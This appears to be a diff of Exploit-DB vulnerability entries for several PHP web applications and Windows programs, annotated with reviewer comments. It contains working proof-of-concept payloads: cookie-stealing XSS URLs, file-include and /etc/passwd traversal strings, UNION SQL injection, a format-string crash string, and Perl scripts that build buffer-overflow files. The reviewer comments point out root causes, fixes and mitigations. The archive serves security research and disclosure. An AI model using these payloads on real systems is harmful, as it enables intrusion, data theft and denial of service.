The 'benja CMS' program is prone to multiple vulnerabilities because it fails to adequately validate input and restrict access. These issues include three cross-site scripting issues, an arbitrary-file-upload issue, and a vulnerability that allows unauthorized access to an administrative script.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to run arbitrary script code in the context of the application, or to access administrative scripts.
These issues affect 'benja CMS 0.1'; other versions may also be affected.
http://www.example.com/[benjacms_path]/admin/admin_edit_topmenu.php/<XSS>
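Review bot: the text in each of the three Benja CMS files lists five issues from BID 29884 (three XSS, an arbitrary-file-upload issue, unauthorised access to an administrative script), but the PoC in each is a single XSS URL and the upload and access-control issues are never shown or referenced, so the description over-promises relative to the file; trim the text to the XSS or point to where the other issues are documented. The payload is placed in the path after `.php/` (PATH_INFO reflection) rather than in a query parameter, which the csv titles (`URL XSS`) should spell out.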

platforms/php/webapps/31960.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29912/info
A+ PHP Scripts News Management System is prone to multiple input-validation vulnerabilities, including a remote file-include issue, multiple local file-include issues, and a cross-site scripting issue.
An attacker can exploit these vulnerabilities to include and execute local and remote scripts in the context of the webserver process. Attackers can also execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
These issues affect News Management System 0.3; other versions may also be vulnerable.
http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/system/include.php?skindir=[SHELL]
http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/register.php?skindir=[LFI]
http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/login.php?skindir=[LFI]
http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/register.php?e=[XSS]
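Review bot: the description counts `multiple local file-include issues`, but all three include URLs use the same `skindir` parameter (`include.php`, `register.php`, `login.php`), so this is one unsanitised include variable reached from three scripts, and the file does not explain why `include.php` is labelled remote (`[SHELL]`) while the other two are labelled local (`[LFI]`) for the same parameter name. Say which condition distinguishes them, or label all three the same way.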

platforms/php/webapps/31961.txt Executable file

@ -0,0 +1,124 @@
-> Title : GDL 4.2 Multiple Vulnerabilities
-> Down. Script : http://kmrg.itb.ac.id/ - http://kmrg.itb.ac.id/gdl42.zip
-> Author : ByEge
-> Home : http://byege.blogspot.com.tr/
-> Tested : Apache/2.2.22 (Win32) PHP/5.4.3
-> Date : 26/02/2014
-> Google Dork : "Powered by GDL 4.2" And "gdl.php?mod=browse"
-> Thanks : F0RTYS3V3N - Cyb3rking - ameN
-> Keyfi : http://www.youtube.com/watch?v=wKGMk56zSPI --> Yaz dostum bo?a geçmi? ömre ya?am denir mi ?
-> Not : Kendini geli?tirmek isteyen arkada?lar kod analizi için kullanabilirsiniz scripti, bir çok güvenlik zaafiyeti var.
###################################
#Directory traversal vulnerability#
###################################
http://localhost/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
http://localhost/index.php?newlang=../../../../../../../../../../etc/passwd%00
Line : gdl42/class/session.php 96 - 99 parameter : newlang
// Setting bahasa
$lang = $_COOKIE['gdl_lang'];
$newlang = $_GET['newlang'];
if (isset($newlang)) {
if (file_exists("./lang/$newlang.php")) {
setcookie("gdl_lang",$newlang,time()+($gdl_sys['page_caching'] * 60));
$gdl_content->language=$newlang;
} else {
setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->language=$gdl_sys['language'];
}
} elseif (isset($lang)) {
$gdl_content->language=$lang;
}else{
setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->language=$gdl_sys['language'];
}
}
function set_theme(){
global $gdl_content, $gdl_sys;
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
http://localhost/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
http://localhost/index.php?newtheme=../../../../../../../../../../etc/passwd%00
Line : gdl42/class/session.php 120 - 123 parameter : newtheme
$theme = $_COOKIE['gdl_theme'];
$newtheme = $_GET['newtheme'];
if (isset($newtheme)) {
if (file_exists("./theme/$newtheme/theme.php")) {
setcookie("gdl_theme",$newtheme,time()+($gdl_sys['page_caching'] * 60));
$gdl_content->theme=$newtheme;
} else {
setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->theme=$gdl_sys['theme'];
}
} elseif (isset($theme)) {
$gdl_content->theme=$theme;
}else{
setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->theme=$gdl_sys['theme'];
}
}
function login($userid,$password) {
global $gdl_auth,$gdl_sys;
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
#############################
#SQL Injection vulnerability#
#############################
http://localhost/download.php?id=injecthere
Line : gdl42/download.php 18 - 24 parameter : id
$file_id = $_GET['id'];
function download_redirect(){
global $file_id,$gdl_db,$gdl_metadata,$gdl_publisher,$gdl_session,$gdl_publisher2;
$dbres = $gdl_db->select("relation","part,path,identifier,uri","relation_id=$file_id");
$file_target=@mysql_result($dbres,0,"path");
$file_part=@mysql_result($dbres,0,"part");
$publisher = $gdl_metadata->get_publisher(@mysql_result($dbres,0,"identifier"));
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
###################################
#Blind SQL Injection vulnerability#
###################################
http://localhost/gdl.php?mod=browse&newlang=english&op=comment&page=read&id=injecthere
Line : gdl42/main.php 119 parameter : id
if ((file_exists("./theme/".$gdl_content->theme."/".$gdl_content->theme."_print.css"))&& ($_GET['mod']== "browse") && ($_GET['op']=="read") && (! empty ($_GET['id'])))
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
########################################
#Cross site scripting xss vulnerability#
########################################
http://localhost/gdl.php?mod=search&action=ByEge&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK
Line : module/search/function.php 38 parameter : keyword
###############################################################################################################################################################################
###############################################################################################################################################################################
Test Vulnerability :
http://server/download.php?id=null/**/and/**/true/**/UNION/**/SELECT/**/CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2--
http://server/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
http://server/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
http://server/gdl.php?mod=search&action=folks&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK
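Review bot: the traversal PoCs contradict the stated test platform. Both `%00` payloads depend on null-byte truncation inside `file_exists("./lang/$newlang.php")` and `file_exists("./theme/$newtheme/theme.php")` (session.php lines 96-99 and 120-123), but PHP rejects paths containing a NUL byte since 5.3.4, so on the listed PHP/5.4.3 the check returns false and the `else` branch simply resets the cookie to `$gdl_sys['language']`/`$gdl_sys['theme']`; either the tested version is wrong or these two findings need re-verification. The underlying weakness is still real: `file_exists()` is the only validation, and the cookie values `$_COOKIE['gdl_lang']` and `$_COOKIE['gdl_theme']` are assigned with no validation at all, so the fix is to accept only values matching something like `preg_match('/^[A-Za-z0-9_-]+$/', $newlang)` (or an explicit list of installed languages/themes) for both the GET and the cookie paths. In download.php lines 18-24, `id` is interpolated unquoted into `"relation_id=$file_id"`; `$file_id = (int)$_GET['id'];` closes that one. For the blind injection, the quoted main.php line 119 is only the gating condition on `mod`, `op` and `id`, not the query that consumes `id`, so the entry does not actually show that sink.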

10
platforms/php/webapps/31963.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29923/info
Link ADS 1 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
http://www.example.com/out.php?linkid=50+and+1=1 (true)
http://www.example.com/out.php?linkid=50+and+1=2 (false)

79
platforms/windows/dos/31899.txt Executable file

@ -0,0 +1,79 @@
# Exploit Title: VLC 2.1.3 WriteAV Vulnerability, Decoders
# Date: 2014/02/20
# Exploit Author: kw4
# Software Link: http://www.videolan.org/vlc/index.html
# Version: 2.1.3
# Impact Med/High
# Tested on: Windows 7 64 bits
Memory corruption when VLC tries to load crafted .avs files.
(2b10.2750): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1a6fdbf8 ebx=15778b88 ecx=00000310 edx=1a2843c0 esi=1a284360
edi=00000311
eip=540716b4 esp=1b34fd50 ebp=00000480 iopl=0 nv up ei pl nz na po
nc
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x1a285000
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Faulting Instruction:540716b4 fstp dword ptr [edx+ecx*4]
Exception Hash (Major/Minor): 0xf1ffd179.0x98f1d37c
Hash Usage : Stack Trace:
Major+Minor : libmpgatofixed32_plugin+0x16b4
Major+Minor : libvlccore!vlc_getProxyUrl+0x411
Major+Minor : libvlccore!aout_FiltersPlay+0x7a
Major+Minor : libvlccore!aout_CheckChannelExtraction+0x17f3
Major+Minor : libvlccore!input_Control+0x1431
Minor : libvlccore!input_Control+0x1708
Minor : libvlccore!input_Control+0x33c5
Minor : ntdll!RtlImageNtHeader+0x30e
Minor : libvlccore!vlc_threadvar_set+0x24
Minor : libvlccore!vlc_threadvar_delete+0x128
Minor : msvcrt!endthreadex+0x6c
Minor : kernel32!BaseThreadInitThunk+0x12
Excluded : ntdll!RtlInitializeExceptionChain+0x63
Excluded : ntdll!RtlInitializeExceptionChain+0x36
Instruction Address: 0x00000000540716b4
Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Exploitable - User Mode Write AV starting at
libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c)
0:010> kd
176efd68 00000102
176efd6c 573a5f11 libvlccore!vlc_getProxyUrl+0x411
176efd70 00000001
176efd74 7efde000
176efd78 176efd98
176efd7c 1a1d2fc8
176efd80 1a1d2fd8
176efd84 00000001
176efd88 00000001
176efd8c 5737dcca libvlccore!aout_FiltersPlay+0x7a
176efd90 15a9cd44
176efd94 1a16ab88
176efd98 00000002
176efd9c 00000000
176efda0 00000000
176efda4 00002710
176efda8 00000000
176efdac 1a16ab88
176efdb0 000283e4
176efdb4 000003e8
Crafted avs file: http://www.exploit-db.com/sploits/31899.avs
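Review bot: the register dump shows this is a linear out-of-bounds write rather than a wild pointer, which the entry should say explicitly: the faulting address 0x1a285000 equals edx + ecx*4 (0x1a2843c0 + 0x310*4), the store is `fstp dword ptr [edx+ecx*4]` in libmpgatofixed32_plugin, and edi=0x311 looks like the loop bound, so the conversion loop walks one element past the end of its output buffer onto an unmapped page. That also means the crashing component is the MPEG-audio-to-fixed32 converter reached through `aout_FiltersPlay`, not the .avs demuxer named in the summary. The entry has no vendor reference, CVE or fixed version; add them once available.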

30
platforms/windows/dos/31913.pl Executable file

@ -0,0 +1,30 @@
#------------------------------------------------------------------------------------#
# Exploit Title: Music AlarmClock 2.1.0 (.m3u) Crash PoC #
# Date: Feb 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://download.cnet.com/Music-AlarmClock/3000-2350_4-10419263.html #
# Version: 2.1.0 #
# Tested on: Windows XP SP3 #
#------------------------------------------------------------------------------------#
# (a10.9e8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=7ffdd000 edx=41414161 esi=00153700 edi=0012df10
# eip=7c90100b esp=0012d5c8 ebp=0012d5d0 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
#!/usr/bin/perl
use strict;
use warnings;
my $filename = "poc.m3u";
my $junk = "A" x 10000;
open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE $junk;
close(FILE);
print "Exploit file created successfully [$filename]!\n";
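Review bot: the `#!/usr/bin/perl` line sits after the 14-line comment header, where it is never honoured as a shebang, so the file only runs as `perl 31913.pl`; move it to line 1. Style: under `use strict`, `open(FILE, ">$filename") || die ...` uses a bareword handle and two-argument open; prefer `open(my $fh, '>', $filename) or die "[-]Error: $!\n";` followed by `print $fh $junk;` and `close($fh);`.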

46
platforms/windows/dos/31914.pl Executable file

@ -0,0 +1,46 @@
?#---------------------------------------------------------------------------------#
# Exploit Title: GoldMP4Player 3.3 - Buffer Overflow PoC (SEH) #
# Date: Feb 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html #
# Version: 3.3 #
# Tested on: Windows XP SP3 #
#---------------------------------------------------------------------------------#
# (cb4.cb0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=05506f41 ebx=00000111 ecx=05503ff1 edx=00130000 esi=05506fe0 edi=00000003
# eip=0041a0c3 esp=0012e25c ebp=054f4f88 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x1a0c3:
# 0041a0c3 8802 mov byte ptr [edx],al ds:0023:00130000=41
# 0:000> !exchain
# 0012e270: image00400000+4c1b3 (0044c1b3)
# 0012e3b0: image00400000+4c56a (0044c56a)
# 0012e430: image00400000+4c4ec (0044c4ec)
# 0012e4e0: *** ERROR: Symbol file could not be found.
# 0012e534: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e748: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e7a8: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e8cc: image00400000+4c333 (0044c333)
# 0012e9f4: <Unloaded_ION.dll>+41414140 (41414141)
# Invalid exception stack at 41414141
#!/usr/bin/perl
use strict;
use warnings;
my $filename = "poc.txt";
my $junk = "A" x 10000;
open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE "http://$junk.swf";
close(FILE);
print "Exploit file created successfully [$filename]!\n";
print "Now open the URL in $filename via File -> Open Flash URL\n";
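Review bot: line 1 of the file begins with a stray character before the first `#` (rendered here as `?`, most likely a byte-order mark or similar encoding artefact), and the `#!/usr/bin/perl` line is again buried below the comment header; strip the stray byte and put the shebang on line 1. The `!exchain` output does support the "(SEH)" in the title: the chain ends in `41414141` after several handlers still inside the application image, so SafeSEH/SEHOP on the host are the relevant mitigations to check. Same filehandle point as 31913: `open(FILE, ">$filename")` should be a lexical, three-argument `open(my $fh, '>', $filename) or die ...`.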


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29928/info
The '5th street' game is prone to a format-string vulnerability.
Exploiting this issue will allow attackers to execute arbitrary code with the privileges of a user running the application. Failed attacks will likely cause denial-of-service conditions.
When the following chat message is sent, the game client of every connected user will crash:
%5000000.x


@ -0,0 +1,33 @@
Application:Notepad++
Version:6.5.2 UNICODE
Get the application from: http://notepad-plus-plus.org/download/v6.5.2.html
Plugin:CCompletion
Version: Version 1.19 ( Unicode )
Get the plugin from: http://sourceforge.net/apps/mediawiki/notepad-plus/index.php?title=Plugin_Central
Vulnerability:Stack buffer overflow
Vulnerability Impact: Local Code Execution
Triggering details:
1. Install Notepad++ (6.5.2) with the plugin CCompletion(Version 1.19 UNICODE)
2. Open Notepad++
3. Input large number of characters (any character is ok), at least 554 characters.
4. Select all the text in the editor
5. Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11, then the Notepad++ will be crashed
Cause of the Vulnerability
The notepad++ sends text the user selected to the plugin of CCompletion, but the plugin copys the text by using lstrcpyW in the module kernel32. So the stack buffer is over flow.
Exploit POC
I constructed an exploit for this vulnerability. It will show a message box with the caption “HA” and the text “Back Door Opend.”
1. This exploit does not process the mitigation of DEP, so if you want to test it please disable the DEP feature on your system or just for the application.
2. This exploit uses the “JMP ESP” insturction in module Notepad++.exe, because it is a non-ASLR module.So the expolit is independent of Windows system version.
The expolit is in the file attatchment named shellcode.txt
1? Open shellcode.txt with Notepad++
2? Select all the content in the editor
3? Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11
Exploit: http://www.exploit-db.com/sploits/31895.7z
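Review bot: the "Cause of the Vulnerability" paragraph pins the overflow on an unbounded `lstrcpyW` of the selected text into a stack buffer in the CCompletion plugin, with 554 characters as the trigger threshold, so the plugin-side fix is a length check against the destination size or a bounded copy such as `lstrcpynW`/`StringCchCopyW`; the note should say so. Two host-side points are also buried in the PoC notes and deserve to be stated as mitigations: the exploit "does not process the mitigation of DEP", and it depends on a `JMP ESP` in Notepad++.exe only because that module is not ASLR-enabled, so leaving DEP on and linking the executable with /DYNAMICBASE each defeat the supplied payload. Text nits in the hunk: "firt", "copys", "insturction", "expolit", "attatchment", "Opend", and the garbled step markers "1?", "2?", "3?".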